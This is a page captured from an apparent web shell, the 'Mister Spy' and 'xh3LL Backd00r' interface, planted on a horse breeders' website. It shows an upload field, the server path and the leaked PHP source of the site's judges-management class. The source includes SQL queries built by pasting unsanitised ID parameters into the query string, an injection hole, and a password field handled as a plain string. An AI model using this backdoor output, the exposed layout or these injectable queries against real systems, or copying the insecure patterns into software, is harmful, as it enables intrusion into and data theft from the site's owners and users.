Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/www/espanol/library/
Upload File :
Current File : /home/caballoscriollos/www/espanol/library/class.jurados.php

<?php 

require_once('class.dbaccess.php');
require_once('class.jurado.php');
require_once('class.filter.php');
require_once('class.page.php');

class Jurados extends DBAccess implements IFilterable
{
	public function ParseFilter(array $filter)
	{
		$sql = '';

		if (isset($filter['CategoriaFuncional']) && $filter['CategoriaFuncional'] != "")
			$sql.= " AND jcp.IdEventosFuncionalesPruebasCategoria = " . DB::Number($filter['CategoriaFuncional']);

		if (isset($filter['IdEventosFuncionalesPrueba']) && $filter['IdEventosFuncionalesPrueba'] != "")
			$sql.= " AND jcp.IdEventosFuncionalesPrueba = " . DB::Number($filter['IdEventosFuncionalesPrueba']);
		
		if (isset($filter['Nombre']) && $filter['Nombre'] != "")
			$sql.= " AND j.Nombre LIKE '%" . DB::StringUnquoted($filter['Nombre']) . "%'";
		
		if (isset($filter['Apellido']) && $filter['Apellido'] != "")
			$sql.= " AND j.Apellido LIKE '%" . DB::StringUnquoted($filter['Apellido']) . "%'";

		if ($filter['Categoria'] != "" )
		{
			switch ( $filter['Categoria'])
			{
				case "A": 
					$sql.= " AND j.CMorfologia IN('A')";
					break;
					
				case "B": 
					$sql.= " AND j.CMorfologia IN('A','B')";
					break;
					
				case "C": 
					$sql.= " AND j.CMorfologia IN('A','B','C')";
					break;
					
				case "D": 
					$sql.= " AND j.CMorfologia IN('A','B','C','D')";
					break;
					
				case "E": 
					$sql.= " AND j.CMorfologia IN('A','B','C','D','E')";
					break;
					
				default: "";
			}
		}

		if (isset($filter['Jurado']) && $filter['Jurado'] == true)
		{
			//$sql.= " AND CMorfologia IN('C','D','E')";
		}

		if (isset($filter['ApruebaFuncional']) && $filter['ApruebaFuncional'] == true)
		{
			$sql.= " AND (CMorfologia IN('A','B') OR ApruebaFuncional = 1)";
		}

		if (isset($filter['ApruebaFuncional']) && $filter['ApruebaFuncional'] == false)
		{
			$sql.= " AND (CMorfologia NOT IN('A','B') AND ApruebaFuncional = 0)";
		}

		if (isset($filter['TipoJurado']) && $filter['TipoJurado'] != "")
		{
			switch ($filter['TipoJurado'])
			{
				case "Veterinaria": 
					$sql.= " AND j.JAVeterinaria = 1";
					break;
					
				case "Morfologia": 
					$sql.= " AND j.JAMorfologia = 1";
					break;
					
				case "Mansedumbre": 
					$sql.= " AND j.JAMansedumbre = 1";
					break;
					
				default: "";
			}
		}

		return $sql;
	}


	public function GetPagesCount(Page $oPage, $filter = false)
	{	
		$sql = "SELECT COUNT(1) / " . DB::Number($oPage->Size) . " AS Count";
		$sql.= " FROM tblJurados j";
		$sql.= " LEFT JOIN tblJuradosPruebasCategorias jcp ON jcp.IdJurado = j.IdJurado";
		$sql.= " WHERE 1";
		
		if ($filter)
			$sql.= " " . $this->ParseFilter($filter);
		
		$sql.= " GROUP BY j.IdJurado";
		
		if (!($oRes = $this->GetQuery($sql)) )		
			return false;

		if ( !($oRow = $oRes->GetRow()) )
			return false;
		
		$Count = $oRow['Count'];
		
		return ceil($Count);
	}


	public function GetAll(array $filter = NULL, Page $oPage = NULL)
	{
		$sql = "SELECT j.*";
		$sql.= " FROM tblJurados j";
		$sql.= " LEFT JOIN tblJuradosPruebasCategorias jcp ON jcp.IdJurado = j.IdJurado";
		$sql.= " WHERE 1";

		if ($filter)
			$sql.= $this->ParseFilter($filter);

		$sql.= " GROUP BY j.IdJurado";
		$sql.= " ORDER BY j.Nombre";

		if ($oPage != NULL)
			$sql.= " " . Pageable::ParsePage($oPage);
		
		if (!($oRes = $this->GetQuery($sql)))
			return false;
			
		$arr = array();
			
		while ($oRow = $oRes->GetRow())	
		{	
			$oJurado = new Jurado();
			$oJurado->ParseFromArray($oRow);
			
			array_push($arr, $oJurado);
			
			$oRes->MoveNext();
		}	
		
		return $arr;		
	}

	public function GetAllByPrueba($IdEventosFuncionalesPrueba , $IdEventosFuncionalesPruebasCategoria = NULL)
	{
		$sql = " SELECT J.*";
		$sql.= " FROM tblJurados J ";
		$sql.= " INNER JOIN tblJuradosPruebasCategorias JPC ON JPC.IdJurado = J.IdJurado ";
		$sql.= " WHERE JPC.IdEventosFuncionalesPrueba = " . $IdEventosFuncionalesPrueba;
		
		if ($IdEventosFuncionalesPruebasCategoria != ""){
			$sql.= " AND IdEventosFuncionalesPruebasCategoria = ".$IdEventosFuncionalesPruebasCategoria;
		}
		$sql.= " ORDER BY Nombre";
		
		if ($oPage != NULL)
			$sql.= " " . Pageable::ParsePage($oPage);
						
		if (!($oRes = $this->GetQuery($sql)))
			return false;
			
		$arr = array();
			
		while ($oRow = $oRes->GetRow())	
		{	
			$oJurado = new Jurado();
			$oJurado->ParseFromArray($oRow);
			
			array_push($arr, $oJurado);
			
			$oRes->MoveNext();
		}	
		
		return $arr;		
	}

	public function GetAllByCategoria(array $filter = NULL, Page $oPage = NULL)
	{
		$sql = "SELECT j.*";
		$sql.= " FROM tblJurados j";
		$sql.= " LEFT JOIN tblJuradosPruebasCategorias jcp ON jcp.IdJurado = j.IdJurado";
		$sql.= " WHERE 1=1 ";
		
		if ($filter)
			$sql.= $this->ParseFilter($filter);

		$sql.= " GROUP BY j.IdJurado";
		$sql.= " ORDER BY j.Nombre";

		if ($oPage != NULL)
			$sql.= " " . Pageable::ParsePage($oPage);
						
		if (!($oRes = $this->GetQuery($sql)))
			return false;
			
		$arr = array();
			
		while ($oRow = $oRes->GetRow())	
		{	
			$oJurado = new Jurado();
			$oJurado->ParseFromArray($oRow);
			
			array_push($arr, $oJurado);
			
			$oRes->MoveNext();
		}	
		
		return $arr;		
	}

	public function GetById($IdJurado)
	{
		$sql = "SELECT j.*";
		$sql.= " FROM tblJurados j";
		$sql.= " WHERE j.IdJurado = " . DB::Number($IdJurado);	
			
		if (!($oRes = $this->GetQuery($sql)))
			return false;
			
		if (!($oRow = $oRes->GetRow()))
			return false;
		
		$oJurado = new Jurado();
		$oJurado->ParseFromArray($oRow);
		
		return $oJurado;		
	}
	

	public function GetByDocumentoNumero($DocumentoNumero)
	{
		$sql = "SELECT *";
		$sql.= " FROM tblJurados";
		$sql.= " WHERE DocumentoNumero = " . DB::String($DocumentoNumero);	
			
		if (!($oRes = $this->GetQuery($sql)))
			return false;
			
		if (!($oRow = $oRes->GetRow()))
			return false;
		
		$oJurado = new Jurado();
		$oJurado->ParseFromArray($oRow);
		
		return $oJurado;		
	}
	
	
	public function GetByDenominacion($Denominacion)
	{
		$sql = "SELECT j.*";
		$sql.= " FROM tblJurados j";
		$sql.= " WHERE j.Nombre = " . DB::String($Denominacion);	
			
		if (!($oRes = $this->GetQuery($sql)))
			return false;
			
		if (!($oRow = $oRes->GetRow()))
			return false;
		
		$oJurado = new Jurado();
		$oJurado->ParseFromArray($oRow);
		
		return $oJurado;		
	}

	public function CheckJurado($Nombre , $IdJurado = NULL )
	{
		$sql = " SELECT COUNT(1) as Count ";
		$sql.= " FROM tblJurados j";
		$sql.= " WHERE j.Jurado = " . DB::String($Nombre);

		if ( $IdJurado != "" ){
			$sql.= " AND j.IdJurado <> " . $IdJurado;
		}

		if (!($oRes = $this->GetQuery($sql)))
			return true;	/* SI NO PUDO REALIZAR LA CONSULTA, LE INFORMO QUE EXISTE */

		if (!($oRow = $oRes->GetRow()))
			return true;	/* SI NO PUDO TRAER LOS DATOS POR PROBLEMAS EN LA BBDD, LE INFORMO QUE EXISTE */

		$Count = $oRow['Count'];

		if ($Count == 0)
			return false;	/* NO EXISTE */

		return true;

	}
	
	public function CheckEmail($Email , $IdJurado = NULL )
	{
		$sql = " SELECT COUNT(1) as Count ";
		$sql.= " FROM tblJurados j";
		$sql.= " WHERE j.Email = " . DB::String($Email);

		if ( $IdJurado != "" ){
			$sql.= " AND j.IdJurado <> " . $IdJurado;
		}

		if (!($oRes = $this->GetQuery($sql)))
			return true;	/* SI NO PUDO REALIZAR LA CONSULTA, LE INFORMO QUE EXISTE */

		if (!($oRow = $oRes->GetRow()))
			return true;	/* SI NO PUDO TRAER LOS DATOS POR PROBLEMAS EN LA BBDD, LE INFORMO QUE EXISTE */

		$Count = $oRow['Count'];

		if ($Count == 0)
			return false;	/* NO EXISTE EL EMAIL */

		return true;

	}

	public function GetCountRows(array $filter = NULL)
	{
		$sql = "SELECT j.*";
		$sql.= " FROM tblJurados j";
		$sql.= " LEFT JOIN tblJuradosPruebasCategorias jcp ON jcp.IdJurado = j.IdJurado";
		$sql.= " WHERE 1";

		if ($filter)
			$sql.= $this->ParseFilter($filter);

		$sql.= " GROUP BY j.IdJurado";
		$sql.= " ORDER BY j.Nombre";
		
		if (!($oRes = $this->GetQuery($sql)))
			return false;
		
		$CountRows = $oRes->NumRows();
		
		return $CountRows;
	}
	
	
	public function Create(Jurado $oJurado)
	{
		$arr = array(
						'IdJurado' 			=> DB::Number($oJurado->IdJurado),
						'Nombre'			=> DB::String($oJurado->Nombre),
						'Apellido'			=> DB::String($oJurado->Apellido),
						'DocumentoNumero'	=> DB::String($oJurado->DocumentoNumero),
						'Email'  			=> DB::String($oJurado->Email),
						'Telefono'			=> DB::String($oJurado->Telefono),
						'Celular'			=> DB::String($oJurado->Celular),
						'NroActa'			=> DB::String($oJurado->NroActa),
						'FDesignacion'		=> DB::Date($oJurado->FDesignacion),
						'Jurado'			=> DB::String($oJurado->Jurado),
						'Clave'				=> DB::String($oJurado->Clave),
						'JAVeterinaria'		=> DB::Bool($oJurado->JAVeterinaria),
						'JAMorfologia'		=> DB::Bool($oJurado->JAMorfologia),
						'JAMansedumbre'		=> DB::Bool($oJurado->JAMansedumbre),
						'CMorfologia'		=> DB::String($oJurado->CMorfologia),
						//'Estado'			=> DB::String($_SESSION['Estado'])
						'Estado'			=> DB::String('A'),
						'ApruebaFuncional'	=> DB::Bool($oJurado->ApruebaFuncional)
		);
		
		if (!$this->Insert('tblJurados', $arr))
			return false;
			
		return $oJurado;
	}
	
	
	public function Update(Jurado $oJurado)
	{
		$where = " IdJurado = " . DB::Number($oJurado->IdJurado);
		
		$arr = array(
						'IdJurado' 			=> DB::Number($oJurado->IdJurado),
						'Nombre'			=> DB::String($oJurado->Nombre),
						'Apellido'			=> DB::String($oJurado->Apellido),
						'DocumentoNumero'	=> DB::String($oJurado->DocumentoNumero),
						'Email'  			=> DB::String($oJurado->Email),
						'Telefono'			=> DB::String($oJurado->Telefono),
						'Celular'			=> DB::String($oJurado->Celular),
						'NroActa'			=> DB::String($oJurado->NroActa),
						'FDesignacion'		=> DB::Date($oJurado->FDesignacion),
						'Jurado'			=> DB::String($oJurado->Jurado),
						'Clave'				=> DB::String($oJurado->Clave),
						'JAVeterinaria'		=> DB::String($oJurado->JAVeterinaria),
						'JAMorfologia'		=> DB::String($oJurado->JAMorfologia),
						'JAMansedumbre'		=> DB::String($oJurado->JAMansedumbre),
						'CMorfologia'		=> DB::String($oJurado->CMorfologia),
						//'Estado'			=> DB::String($_SESSION['Estado'])
						'Estado'			=> DB::String('A'),
						'ApruebaFuncional'	=> DB::Bool($oJurado->ApruebaFuncional)
		);		
		
		if (!DBAccess::Update('tblJurados', $arr, $where))
			return false;
		
		return $oJurado;
	}
	

	public function Delete($IdJurado)
	{
		if (!DBAccess::$db->Begin())
			return false;
			
		$where = " IdJurado = " . DB::Number($IdJurado);
		
			if (!DBAccess::Delete('tblJurados', $where))
		{
				DBAccess::$db->Rollback();	
				return false;
		}
		
		if (!DBAccess::Delete('tblJuradosPruebasCategorias', $where))
		{
				DBAccess::$db->Rollback();	
				return false;
		}
		
		if (!DBAccess::Delete('tblJuradosPropietarios', $where))
		{
				DBAccess::$db->Rollback();	
				return false;
		}

		DBAccess::$db->Commit();
		
		return true;	
	}

	public function DeletePruebas($IdJurado)
	{
		if (!DBAccess::$db->Begin())
			return false;
			
		$where = " IdJurado = " . DB::Number($IdJurado);
		if (!DBAccess::Delete('tblJuradosPruebasCategorias', $where))
		{
				DBAccess::$db->Rollback();	
				return false;
		}

		DBAccess::$db->Commit();
		
		return true;	
	}
	
	
	
	
	
}

?>

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat